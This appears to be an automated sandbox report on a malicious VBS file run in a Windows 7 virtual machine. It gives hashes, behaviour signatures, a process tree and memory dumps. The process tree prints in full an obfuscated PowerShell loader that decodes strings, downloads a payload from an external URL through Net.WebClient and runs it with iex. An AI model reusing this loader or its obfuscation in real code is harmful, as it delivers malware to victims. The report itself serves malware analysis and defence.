Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    12/06/2024, 15:10

General

  • Target

    1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs

  • Size

    132KB

  • MD5

    77818ebbfbaed2bcdf22c0132e7ab103

  • SHA1

    1c863ef727d3d363de06909c1eab3d3206a45f91

  • SHA256

    1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859

  • SHA512

    15fa46e9ac136559638731e2257a847fc4aca1e86d2db29465357e6ec54f820a5b9da7dc2749d1a8fc283435ae51b9cdc655fc9ae3e8a83a03422972b1e59b3f

  • SSDEEP

    3072:fwuzkYMPZJqaVBsPHFBktYkCeJ+URvMP/Rj5mk36VYK4qhU4IsMMBlKcUWLZ:f7kYMPZoaVBsPHFBqYkR+URkP/Rj5mjN

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 62 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Windows\System32\ping.exe
      ping google.com -n 1
      2⤵
      • Runs ping.exe
      PID:1716
    • C:\Windows\System32\ping.exe
      ping %.%.%.%
      2⤵
      • Runs ping.exe
      PID:3036
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c dir
      2⤵
        PID:2288
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$badehuset = 1;Function Tontiner($Pujas206){$Thoroughness=$Pujas206.Length-$badehuset;$Projektidxd114='Substring';For( $Mindetavlen252=5;$Mindetavlen252 -lt $Thoroughness;$Mindetavlen252+=6){$Slingers+=$Pujas206.$Projektidxd114.Invoke( $Mindetavlen252, $badehuset);}$Slingers;}function footbridges($Skattekorts){ . ($Revises) ($Skattekorts);}$Quinonic=Tontiner 'tagetM,stopoTambozNo.coi.endslHotsplDi.agaSp,nn/Repro5Carlo.Solol0 Flns Holdu(N nmeWDatofi ilymnsh.mmdRigsmoCunylwSlipks.emon RepiNAngelT U bo Berne1Sknke0Henb,.Raket0Court;Danne InsisWOktaliBivaanUnd.r6 Qual4Mortu;Gra m SikkxEroti6.rflj4Pol.e;Overc .upprBroadvSrhft:Bager1Nonsu2Retro1 Cont. G,lf0Films) Fera Non.eGLeptoe Hovec F nekUltraoSt,di/endo 2Ti.sm0 Loya1delre0Sulph0 ,usi1D.spo0rutt.1P sid PhotoFLaspriSmlderBromyeFamilfziggioSayabxSudat/Irela1Mesna2 Deon1Patr...koda0Audin ';$Personregisterets=Tontiner 'PomegUpluvisI,tereHo rorHyper-sjleaA Teo,gundese SandnH.rtytBlo,p ';$Fishwood=Tontiner 'Mi.eyhPantetIngvatAarenpPusslsDe.ar:Pen.i/H.lic/,remkwTriksw GarrwVrtsh. E,feaPropatOdocoo GuldramplidSchiseFalc gLomba.T,melcPalsyo EmblmFring.TronsbWithirdolph/Sa,meU Din,pAbefehUn.ero SkilaRegarrHelnodP,radiSprotnBssesgSejlk. Cow,h t.eshLifelpColum ';$counterintelligence=Tontiner 'Sam,e>Exo,r ';$Revises=Tontiner ',indeiTagdkeOutblxkvajp ';$Maldiverne='Pedeller';$supertranscendentness = Tontiner 'Inspie.epyscCackehOpsigoHecto Fimbr%Japhea ClaupSov,hp torhdcomplaPrim.tAttraa Pass% rees\vernoD,enfdiSminto Mul.m.capueMrknidReconeSkiftsFavou. atalMTranqeO.kalt Bagt Snows&resti& Velk BuddieDixiecHuyghh TovroTegns edit elv ';footbridges (Tontiner ' stm$B rdegMuckilFj rto Salvb embrafemdolAfmel:GrundARundscAfrivhBenztiFarten C,areLet,rs.nganeH.rti=Submo(RetskcSk,rlmAvlstdporte S.mit/Udlsec Neds F lia$Sil csNih,luTurbopAmpuleBrepirRadiot otalrBefataM,bilnGeo gsAc,accSubsteDis,anExterdRef reFlappn Atl.tJustinAdteve Tkk,s Frigs.dels)Peni, ');footbridges (Tontiner 'kines$pe.ocg.dvarlM skio,icrob UltraDoughlSulph:ForurLNvnspa teruEmielgTudsehThr.nipul cnMavengeffeksLumb.=Woozl$RekorFPigmeiSh,iksLion.hInverwChrisoBiennoSeq.adSubal.Skil sRressp Indkl Bla iFrkentPo os(Hepca$UdvikcPaedeoStoppuOliernfo,nttPr,queWa.slr Urugiudst n M,cht ,ilbeDosmelDe.idlFortliHalslg Un.oeKons.nsnigvcZarereBarra)Moles ');$Fishwood=$Laughings[0];$Scrotocele= (Tontiner 'Discr$ferskgPreorlUncisokathab AeroaSalutl,elta:OpvarD ,omiiDr,kmg ,npatBlgeteAnticrU dervFo earBr.shkSnitteTrstetTwa ksImpot= To hNPiiabeN.stiw Iva.-Skot,Opoly,bHorrijTebreeSkuffcpli,stSkarp OctahSsho.ey sekss M,rrtSter.ePyro.mBrnds. elonNUdra,eDi.kntFatti. UndeWNud,leCrowsb ShadC TelelLasari Bry.eSplennRevist');$Scrotocele+=$Achinese[1];footbridges ($Scrotocele);footbridges (Tontiner 'Potcr$Du.frD ulvei pidng jordtVind,e rratrDematvFloutr Svankuncohe UnsttEft.rs .ibb.AndroHStrene FebraSvagsdClosee.ierorGlobasAncyl[,rgen$UnworPIn,pieSpa,crsa.chsUn eroUdha,nS,ondrPerr.eFortag CycliAmendsNissetGeneseStolerStilkeAppritUnforsMower] Para=Swish$RelenQEf.eruKlodsiAgarwnParanoFedt nUnderi th.ecRebu, ');$Biloculina=Tontiner ',etta$FaresDPsychiTil agBurg.tPleureSieror,roduvMicror DirikHavareFlkkst ,ecosNonle. RustDAr,afoIndexwSkrebnF rtflBluebo MissaRdkrid PhotF.iramiUncralPortheKe me(clegg$EnergFColliiAkties Prophsto hwSkraaoSt kno.ermidBenme,Lexic$ J.veAS.rmulOvisiiKyo,dyPolonaNu,anhrumne)Fortr ';$Aliyah=$Achinese[0];footbridges (Tontiner 'B.rtv$RechugSmreolU kreoByggebD.leva EqualSamme:OpsluSB,shatJerimeRegendLyksah Sp,oo MalerScorbsWarileSkiftsGodtg=Valgb(Mo,saTMhedeeDownpsCathatStint- poliPStortaPeript UndehUdva, Subra$EgetrABeciflCampiiInaccy SystaSva,eh S,pr)Ne to ');while (!$Stedhorses) {footbridges (Tontiner ' .ile$Opposga omalEnvisoOpl ibBylanaTe eglbogst:frid.T,errueVaabesB,kletAs ondMi era onotPep,oaForefsreceptUnove=Tilve$fribrt E,ucr M touSkorteAlmue ') ;footbridges $Biloculina;footbridges (Tontiner ' Art S galetUnthiaVi,gurlobsttNonde-So,tySIdiomlIntere BarbeDokkepNonda sympt4 Udbl ');footbridges (Tontiner ' Rele$ llomgDena l nkoo .pstbSkovma InvalLser,:QuotiSTescht FaneeJuleedImpl,hSatsboParafrAc essSwa.geTve psCori = Dor,(ArgenT Gglee Bo.bsDechitAdenf- l mmPNaturaUtinatDecemh Foru Prere$GymnaAB medlSayabiMaveryOver,aFannehButik)methy ') ;footbridges (Tontiner ' Osti$fecu gPeraglHvaeloIndolb millaNontalVanva:,uperPTreelrL,rici For,oTanderAs.etiDubbet,orhaespaadtValgbsUvilkh.njouaTo.tovnas.iest,kvrPar veRistesArina=Biote$ ProrgGu,sblBil coBedr.b Hunda horilAuxes:MullsAGodkefMumhotHumusvAffaltSk ort Solhe ReinlBellis Tal.eFuld,rTempenPrenieTu nd+print+Sorte% Pitc$GoldfL erreaSlynguTenemgT asshPr tfiStamfnPres.g,xtras,orde.HalvbcP gmsoUnox,uCentenTotidtDagli ') ;$Fishwood=$Laughings[$Prioritetshaveres];}$Fantasteriers79=344305;$stjernetydere=28583;footbridges (Tontiner 'Fej p$Nondog MdealCoaguoTosprbAntr aLangvlFockl:Lo.dsPHurlsr,ammeo Uds tTo reeInexprNeutrvKodeliEq.iltFortry kons hazza=Afh.t TrophGReinceStorktPelar-SkimmCSph.ro .oksnIrv,nt .raneDavennBajett Faam Messi$ oma,A Ubbel,hirti ProvyPostmaA.ernhRa.pe ');footbridges (Tontiner ' G.ns$Al,ohgSupral C,enoAvi.sbTropeaunlizlStvfr:StonaUJammenKardic SlesoTittinS xtifYel,eiMarg.nUnbrae F agd Pestl BlesyRu.ri Luxa.=Out.i Dow.[Tr dvSNednoy Prias.egirtCranieMisremAfd l.inte.CElemeoRed,en N vev DigeeSoie.rFilostAr.it]Repub:Boje.:AlnatFPrmierN tiooPageamHecatBDecoraScribsOmnifeBerid6sophi4GartnSPergatBarderEmbariApomenUno,igOpist(Odiou$TilflPKrakerTiosuosubsitPhotoeSka.trFolktv,orsfihariat Rou,yVerde)Menne ');footbridges (Tontiner 'Syrne$GaskrgFags lUnquao .ageb Bal,aLykkelfarts: R.apFDehuma Te,mr,ochoeBemintMul,irNomaduTr cteVedhnnNatted plamekleptsFrake1Pleje6S tte1Sving Ou.gr=Besid Atom[KronrSN,deryJ.nglsCathotSstvleHjortm ,opl.UnconTBeskyeForlnxquadrtPha.t. Her EPibalnFej,lcPhoebo orddLovlyi,ambunMars g O.ts].kraa:De.ug: Ol.nACentrSAbonnCpiebaI FordIUforg.Ser.oGRafleeGespetSu asSA,falt .jerrHoverimumpenSpoong ilei(therm$TrochUSuckunRokkecLaroioEmnean,olsjfKneppiGrnthnYomereBlunkdFornol SkruyDefin)Vanre ');footbridges (Tontiner 'modal$Knowhgta.etlDeem,oTerutbUnestaFyrbdlKant :desanOOrdinvN,tteeru isr arsfPlantoTabagrDysfamthoroyBesrgnUnresdRig.ie,atterSpgel1Aften6Cavea3 Gens=Trret$ LysrFenddaaRadbrr,lcedeZaport SverrSemimuNature Til nKortld Raine DepasStift1Molap6Vindi1Rhizo.Ildsls ArcauSprgebBill.sPilf tSa mer PrakiCaymanAppregbasep( Emod$BondeFS.iffaGrisonSkuldtUnex.a Paa sBerlitSkib.e.olkerbnderi Pla.eBlephrRegros tork7Hygum9E.spe,Opspr$preobsUdsg.tLoyrejSidsteBeto.r AutonLigese de.otOvertyAdresdResp,eGr,ahr Antie.eods)craju ');footbridges $Overformynder163;"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2672
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Diomedes.Met && echo t"
          3⤵
            PID:2844

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2672-4-0x0000000002AB0000-0x0000000002B30000-memory.dmp

        Filesize

        512KB

      • memory/2672-5-0x000000001B630000-0x000000001B912000-memory.dmp

        Filesize

        2.9MB

      • memory/2672-6-0x0000000002860000-0x0000000002868000-memory.dmp

        Filesize

        32KB

      • memory/2672-7-0x0000000002AB0000-0x0000000002B30000-memory.dmp

        Filesize

        512KB